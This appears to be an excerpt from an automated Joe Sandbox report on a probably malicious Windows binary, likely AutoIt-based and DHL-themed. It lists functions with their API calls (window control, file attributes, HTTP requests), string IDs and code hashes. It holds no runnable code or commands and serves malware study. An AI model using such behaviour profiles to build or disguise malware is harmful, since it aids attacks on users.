                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000A33F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-3080491070
                                                                                      • Opcode ID: 72b526be7a055226e21fc3841c32950984e97fe62f0608dd5309c18fb97cba31
                                                                                      • Instruction ID: f1496586ec337dbdcd529c3b64e392e7141f15e77337846516c837ee56053849
                                                                                      • Opcode Fuzzy Hash: 72b526be7a055226e21fc3841c32950984e97fe62f0608dd5309c18fb97cba31
                                                                                      • Instruction Fuzzy Hash: 5A517C71D00209BADF16EBE4CD46EEEB7B8AF05340F104165F605760A2EB752F98DB61
                                                                                      Function 0009B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 1256254125-769500911
                                                                                      • Opcode ID: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                                                                      • Instruction ID: d5867ef3fc190abdd571cf2aa017a74bcb2c4e47defc9fa5d5652e14097cbf31
                                                                                      • Opcode Fuzzy Hash: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                                                                      • Instruction Fuzzy Hash: 4A412B32A041269BCF206F7DDE905BEB7E5AFA0774B244229E421D7280E739DC81E390
                                                                                      Function 000A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A53A0
                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000A5416
                                                                                      • GetLastError.KERNEL32 ref: 000A5420
                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 000A54A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                      • API String ID: 4194297153-14809454
                                                                                      • Opcode ID: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                                                                      • Instruction ID: 66819cbebef694e858e2ca37cd2b9ae7902e006be29334b736b8615c65e991d8
                                                                                      • Opcode Fuzzy Hash: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                                                                      • Instruction Fuzzy Hash: A631BF35A006089FD710DFA8C884EEEBBF4FB0A30AF188065E505CB692D775DD82CB90
                                                                                      Function 0009B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0009B151
                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B165
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0009B16C
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B17B
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0009B18D
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1A6
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1B8
                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1FD
                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B212
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B21D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2156557900-0
                                                                                      • Opcode ID: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                                                                      • Instruction ID: 14e7ee39502febb726976733fb1d63dd75bb84080a407254d371e969a994cd8f
                                                                                      • Opcode Fuzzy Hash: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                                                                      • Instruction Fuzzy Hash: 1F31AD71504204BFEF209F28EE48F6DBBADFB51325F104009FA55D6190D7B8AE819F60
                                                                                      Function 00062C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00062C94
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 00062CA0
                                                                                      • _free.LIBCMT ref: 00062CAB
                                                                                      • _free.LIBCMT ref: 00062CB6
                                                                                      • _free.LIBCMT ref: 00062CC1
                                                                                      • _free.LIBCMT ref: 00062CCC
                                                                                      • _free.LIBCMT ref: 00062CD7
                                                                                      • _free.LIBCMT ref: 00062CE2
                                                                                      • _free.LIBCMT ref: 00062CED
                                                                                      • _free.LIBCMT ref: 00062CFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                                                                      • Instruction ID: 053ce59edaa254d97d7cd6f8cd65d2b17eb2e6fdaf406fe36c15ef6296b839d0
                                                                                      • Opcode Fuzzy Hash: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                                                                      • Instruction Fuzzy Hash: 7B117476600508BFCB06EF54D982CDD3BA6FF45390F5145A5FA489F223DA31EE509BA0
                                                                                      Function 00031410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00031459
                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 000314F8
                                                                                      • UnregisterHotKey.USER32(?), ref: 000316DD
                                                                                      • DestroyWindow.USER32(?), ref: 000724B9
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0007251E
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0007254B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                      • String ID: close all
                                                                                      • API String ID: 469580280-3243417748
                                                                                      • Opcode ID: 46957f933c66e1ffac175e883195accd9f5f7f0d4caa55f3a59b355e4fcd48fa
                                                                                      • Instruction ID: 45a45f337461acfdfce95a123900eb8885fc5162517d4afc9d8b8ada80eca661
                                                                                      • Opcode Fuzzy Hash: 46957f933c66e1ffac175e883195accd9f5f7f0d4caa55f3a59b355e4fcd48fa
                                                                                      • Instruction Fuzzy Hash: 2AD16E31B01212CFDB2AEF55C499FA9F7A4BF09700F1582ADE44A6B252CB34AD12CF54
                                                                                      Function 000A7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A7FAD
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A7FC1
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000A7FEB
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 000A8005
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8017
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8060
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A80B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                      • String ID: *.*
                                                                                      • API String ID: 769691225-438819550
                                                                                      • Opcode ID: 6fe72be19d448ebce5bd4f2fdc7e131a9a0ee427d776704b554d79fa652464dd
                                                                                      • Instruction ID: 235b664dee16afb4bf58ce37d226e713a4bc55fb02719c34cf258fde7c2983cd
                                                                                      • Opcode Fuzzy Hash: 6fe72be19d448ebce5bd4f2fdc7e131a9a0ee427d776704b554d79fa652464dd
                                                                                      • Instruction Fuzzy Hash: 2981B1725082419FDB64DF94C8449AEB3E8BF8A310F148C6EF889D7251EB35DD49CB52
                                                                                      Function 00035BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00035C7A
                                                                                        • Part of subcall function 00035D0A: GetClientRect.USER32(?,?), ref: 00035D30
                                                                                        • Part of subcall function 00035D0A: GetWindowRect.USER32(?,?), ref: 00035D71
                                                                                        • Part of subcall function 00035D0A: ScreenToClient.USER32(?,?), ref: 00035D99
                                                                                      • GetDC.USER32 ref: 000746F5
                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00074708
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00074716
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0007472B
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00074733
                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000747C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                      • String ID: U
                                                                                      • API String ID: 4009187628-3372436214
                                                                                      • Opcode ID: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                                                                      • Instruction ID: 6fe5d15eacc0f349a28cab3f4900633199e832419099ac738d5fb3f71e6dcae8
                                                                                      • Opcode Fuzzy Hash: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                                                                      • Instruction Fuzzy Hash: 5671DD34804205DFCF268F64CD84EBE3BF5FF4A325F188269E9595A2A6C7389881DF51
                                                                                      Function 000A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000A35E4
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • LoadStringW.USER32(00102390,?,00000FFF,?), ref: 000A360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-2391861430
                                                                                      • Opcode ID: f1b3d602b773801d2555053ed542984dacee205214263733c8ac3534d5e73ab7
                                                                                      • Instruction ID: b08159f9a6970f7f2e0b40ba690a08b060010352866397118bb640d68c039506
                                                                                      • Opcode Fuzzy Hash: f1b3d602b773801d2555053ed542984dacee205214263733c8ac3534d5e73ab7
                                                                                      • Instruction Fuzzy Hash: D2516E71804209BBDF15EBE0CC82EEDBB78AF05310F145125F205761A2EB711B99DFA1
                                                                                      Function 000C2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C2E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000C2EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000C2EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C2F0B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 2178440468-1923361398
                                                                                      • Opcode ID: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                                                                      • Instruction ID: fded0992901986a0799d2a031e37539e638682828adea777a45f589bbb35ad06
                                                                                      • Opcode Fuzzy Hash: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                                                                      • Instruction Fuzzy Hash: BA313530604254AFEB20DF18DC84FA937E0FB9A710F150168F944AFAB2CBB5AC80DB00
                                                                                      Function 000AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC2CA
                                                                                      • GetLastError.KERNEL32 ref: 000AC322
                                                                                      • SetEvent.KERNEL32(?), ref: 000AC336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                      • Instruction ID: eabc88df7c123f4bff00898a0ba863c7d2f8aec66835cf218a385abb8559e2b1
                                                                                      • Opcode Fuzzy Hash: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                      • Instruction Fuzzy Hash: 60317FB2504604AFFB219FA4CC88EAB7BFCEB4A744F15851EF44AD6201DB34DE059B60
                                                                                      Function 0009989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00073AAF,?,?,Bad directive syntax error,000CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000998BC
                                                                                      • LoadStringW.USER32(00000000,?,00073AAF,?), ref: 000998C3
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00099987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 858772685-4153970271
                                                                                      • Opcode ID: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                                                                      • Instruction ID: e4d4b2ba0b96a9902762ca0244648191305d79230c6f3da5b4bd9ef137bff797
                                                                                      • Opcode Fuzzy Hash: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                                                                      • Instruction Fuzzy Hash: 59215E3184021EABDF16AF94CC46EEE7779FF18300F044469F619660A2EB75AA18EB50
                                                                                      Function 0009209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32 ref: 000920AB
                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 000920C0
                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0009214D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameParentSend
                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                      • API String ID: 1290815626-3381328864
                                                                                      • Opcode ID: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                      • Instruction ID: 9e3ed4af8df75a74c266fd6f48926b3993a564105d3bb350367ec8d50b8ef90f
                                                                                      • Opcode Fuzzy Hash: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                      • Instruction Fuzzy Hash: 7F11EC7A688706BAFE116720DC07DFB37DCDB15726F200116FB04A90E2FFA558557614
                                                                                      Function 00068D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                      • Instruction ID: 64925fcf7e326d840ddc240013e141eac246c497ad2e8fe0d16f71647c6cfce6
